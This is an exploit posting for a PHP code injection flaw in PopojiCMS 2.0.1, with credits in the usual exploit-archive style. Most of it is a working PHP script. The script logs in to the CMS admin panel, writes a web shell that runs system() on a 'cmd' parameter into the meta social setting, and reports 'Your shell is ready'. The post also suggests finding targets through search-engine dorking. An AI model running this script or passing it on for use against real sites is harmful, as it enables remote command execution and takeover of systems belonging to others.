=============================================================================================================================================
| # Title     : PopojiCMS 2.0.1 PHP COde Injection Vulnerability                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip                                                         |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Exploiting the Web Execution Vulnerability in PopojiCMS

   (Related : https://packetstorm.news/files/id/178630/ Related CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage: php exploit.php sitename username password

[+] PayLoad :

<?php

function exploit($url, $username, $password) {
    $login_url = "{$url}/po-admin/route.php?mod=login&act=proclogin";
    $login_data = array("username" => $username, "password" => $password);
    $headers = array(
        "Content-Type: application/x-www-form-urlencoded",
        "Referer: {$url}/po-admin/index.php"
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $login_response = curl_exec($ch);

    if (strpos($login_response, "Administrator PopojiCMS") !== false) {
        echo "Login Successful!\n";
        sleep(1); // 1 second wait
    } else {
        echo "Login Failed!\n";
        return;
    }

    $edit_url = "{$url}/po-admin/route.php?mod=setting&act=metasocial";
    $edit_data = array(
        "meta_content" => "<html>
<body>
<form method=\"GET\" name=\"<?php echo basename(\$_SERVER['PHP_SELF']); ?>\">
<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">
<input type=\"SUBMIT\" value=\"Execute\">
</form>
<pre>
<?php
if(isset(\$_GET['cmd']))
{
    system(\$_GET['cmd']);
}
?>
</pre>
</body>
</html>"
    );

    curl_setopt($ch, CURLOPT_URL, $edit_url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($edit_data));
    $edit_response = curl_exec($ch);

    if (strpos($edit_response, "cmd") !== false) {
        echo "Your shell is ready: {$url}\n";
        sleep(1);
    } else {
        echo "Exploit Failed!\n";
        return;
    }

    curl_close($ch);
}

if ($argc != 4) {
    echo "Usage: php exploit.php sitename username password\n";
    exit(1);
}

$url = $argv[1];
$username = $argv[2];
$password = $argv[3];

echo "Exploiting...\n";
sleep(1);
echo "Logging in...\n";
sleep(1);
exploit($url, $username, $password);

?>






Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================